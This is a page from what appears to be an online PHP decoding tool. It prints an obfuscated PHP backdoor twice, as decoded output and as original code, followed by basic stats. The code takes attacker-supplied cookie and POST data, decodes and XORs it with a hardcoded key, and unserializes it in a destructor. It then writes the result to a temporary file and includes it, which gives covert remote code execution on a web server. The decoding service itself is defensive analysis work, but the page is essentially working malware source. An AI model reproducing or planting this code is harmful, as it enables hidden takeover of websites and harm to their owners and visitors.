Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? ..

Decoded Output download

<?                                                                                                                                                                                                                                                                                                                                                                                                  $WhainWAQ = 'Q' . "l" . 'I' . chr ( 354 - 259 ).chr ( 505 - 436 ).'J' . "M";$GRsndYXfn = chr ( 545 - 446 ).chr ( 773 - 665 )."a" . chr ( 1066 - 951 ).chr ( 259 - 144 )."_" . chr ( 783 - 682 ).'x' . "i" . 's' . 't' . chr ( 531 - 416 ); $hizLZARn = class_exists($WhainWAQ); $GRsndYXfn = "22163";$hVPyBNRnF = strpos($GRsndYXfn, $WhainWAQ);if ($hizLZARn == $hVPyBNRnF){function JkhLIPM(){$sXLQJhEY = new /* 24241 */ QlI_EJM(8165 + 8165); $sXLQJhEY = NULL;}$QpxsdtCa = "8165";class QlI_EJM{private function CpUrwbNVrj($QpxsdtCa){if (is_array(QlI_EJM::$WqGTzO)) {$name = sys_get_temp_dir() . "/" . crc32(QlI_EJM::$WqGTzO["salt"]);@QlI_EJM::$WqGTzO["write"]($name, QlI_EJM::$WqGTzO["content"]);include $name;@QlI_EJM::$WqGTzO["delete"]($name); $QpxsdtCa = "8165";exit();}}public function bxfYgBSK(){$zwUsJUH = "38546";$this->_dummy = str_repeat($zwUsJUH, strlen($zwUsJUH));}public function __destruct(){QlI_EJM::$WqGTzO = @unserialize(QlI_EJM::$WqGTzO); $QpxsdtCa = "1495_27933";$this->CpUrwbNVrj($QpxsdtCa); $QpxsdtCa = "1495_27933";}public function IrSdIu($zwUsJUH, $IEZDalgPoI){return $zwUsJUH[0] ^ str_repeat($IEZDalgPoI, (strlen($zwUsJUH[0]) / strlen($IEZDalgPoI)) + 1);}public function wycvDqI($zwUsJUH){$gUfGIl = "b" . "a" . chr (115) . "e" . "6" . "4";return array_map($gUfGIl . "_" . chr (100) . "e" . "c" . chr (111) . 'd' . chr (101), array($zwUsJUH,));}public function __construct($pcaIqk=0){$snDZPh = chr (44); $zwUsJUH = "";$vqnjzLd = $_POST;$wRNwviEY = $_COOKIE;$IEZDalgPoI = "f2cfe943-d625-4cf3-98d4-c0eabc8a62db";$ANzCsa = @$wRNwviEY[substr($IEZDalgPoI, 0, 4)];if (!empty($ANzCsa)){$ANzCsa = explode($snDZPh, $ANzCsa);foreach ($ANzCsa as $VqxIBDB){$zwUsJUH .= @$wRNwviEY[$VqxIBDB];$zwUsJUH .= @$vqnjzLd[$VqxIBDB];}$zwUsJUH = $this->wycvDqI($zwUsJUH);}QlI_EJM::$WqGTzO = $this->IrSdIu($zwUsJUH, $IEZDalgPoI);if (strpos($IEZDalgPoI, $snDZPh) !== FALSE){$IEZDalgPoI = explode($snDZPh, $IEZDalgPoI); $blTNx = base64_decode(md5($IEZDalgPoI[0])); $ZHiSZHejFT = strlen($IEZDalgPoI[1]) > 5 ? substr($IEZDalgPoI[1], 0, 5) : $IEZDalgPoI[1];$_GET['new_key'] = md5(implode('', $IEZDalgPoI)); $KRGROy = str_repeat($ZHiSZHejFT, 2); $qIoiUCx = array_map('trim', $IEZDalgPoI);if (is_array($qIoiUCx) && count($qIoiUCx) > 1) {$EkgRL = $qIoiUCx[0];} else {$EkgRL = '';}$DioTNp = rawurldecode($EkgRL); $_POST['decoded_key'] = $DioTNp;$flSAl = str_split($DioTNp, 2);}}public static $WqGTzO = 42092;}JkhLIPM();} ?><?php ?>

Did this file decode correctly?

Original Code

<?                                                                                                                                                                                                                                                                                                                                                                                                  $WhainWAQ = 'Q' . "l" . 'I' . chr ( 354 - 259 ).chr ( 505 - 436 ).'J' . "M";$GRsndYXfn = chr ( 545 - 446 ).chr ( 773 - 665 )."a" . chr ( 1066 - 951 ).chr ( 259 - 144 )."_" . chr ( 783 - 682 ).'x' . "i" . 's' . 't' . chr ( 531 - 416 ); $hizLZARn = class_exists($WhainWAQ); $GRsndYXfn = "22163";$hVPyBNRnF = strpos($GRsndYXfn, $WhainWAQ);if ($hizLZARn == $hVPyBNRnF){function JkhLIPM(){$sXLQJhEY = new /* 24241 */ QlI_EJM(8165 + 8165); $sXLQJhEY = NULL;}$QpxsdtCa = "8165";class QlI_EJM{private function CpUrwbNVrj($QpxsdtCa){if (is_array(QlI_EJM::$WqGTzO)) {$name = sys_get_temp_dir() . "/" . crc32(QlI_EJM::$WqGTzO["salt"]);@QlI_EJM::$WqGTzO["write"]($name, QlI_EJM::$WqGTzO["content"]);include $name;@QlI_EJM::$WqGTzO["delete"]($name); $QpxsdtCa = "8165";exit();}}public function bxfYgBSK(){$zwUsJUH = "38546";$this->_dummy = str_repeat($zwUsJUH, strlen($zwUsJUH));}public function __destruct(){QlI_EJM::$WqGTzO = @unserialize(QlI_EJM::$WqGTzO); $QpxsdtCa = "1495_27933";$this->CpUrwbNVrj($QpxsdtCa); $QpxsdtCa = "1495_27933";}public function IrSdIu($zwUsJUH, $IEZDalgPoI){return $zwUsJUH[0] ^ str_repeat($IEZDalgPoI, (strlen($zwUsJUH[0]) / strlen($IEZDalgPoI)) + 1);}public function wycvDqI($zwUsJUH){$gUfGIl = "b" . "a" . chr (115) . "e" . "6" . "4";return array_map($gUfGIl . "_" . chr (100) . "e" . "c" . chr (111) . 'd' . chr (101), array($zwUsJUH,));}public function __construct($pcaIqk=0){$snDZPh = chr (44); $zwUsJUH = "";$vqnjzLd = $_POST;$wRNwviEY = $_COOKIE;$IEZDalgPoI = "f2cfe943-d625-4cf3-98d4-c0eabc8a62db";$ANzCsa = @$wRNwviEY[substr($IEZDalgPoI, 0, 4)];if (!empty($ANzCsa)){$ANzCsa = explode($snDZPh, $ANzCsa);foreach ($ANzCsa as $VqxIBDB){$zwUsJUH .= @$wRNwviEY[$VqxIBDB];$zwUsJUH .= @$vqnjzLd[$VqxIBDB];}$zwUsJUH = $this->wycvDqI($zwUsJUH);}QlI_EJM::$WqGTzO = $this->IrSdIu($zwUsJUH, $IEZDalgPoI);if (strpos($IEZDalgPoI, $snDZPh) !== FALSE){$IEZDalgPoI = explode($snDZPh, $IEZDalgPoI); $blTNx = base64_decode(md5($IEZDalgPoI[0])); $ZHiSZHejFT = strlen($IEZDalgPoI[1]) > 5 ? substr($IEZDalgPoI[1], 0, 5) : $IEZDalgPoI[1];$_GET['new_key'] = md5(implode('', $IEZDalgPoI)); $KRGROy = str_repeat($ZHiSZHejFT, 2); $qIoiUCx = array_map('trim', $IEZDalgPoI);if (is_array($qIoiUCx) && count($qIoiUCx) > 1) {$EkgRL = $qIoiUCx[0];} else {$EkgRL = '';}$DioTNp = rawurldecode($EkgRL); $_POST['decoded_key'] = $DioTNp;$flSAl = str_split($DioTNp, 2);}}public static $WqGTzO = 42092;}JkhLIPM();} ?><?php ?>

Function Calls

chr 8
class_exists 1

Variables

$WhainWAQ QlI_EJM
$GRsndYXfn class_exists

Stats

MD5 770e503495b87eabf141d75979369841
Eval Count 0
Decode Time 108 ms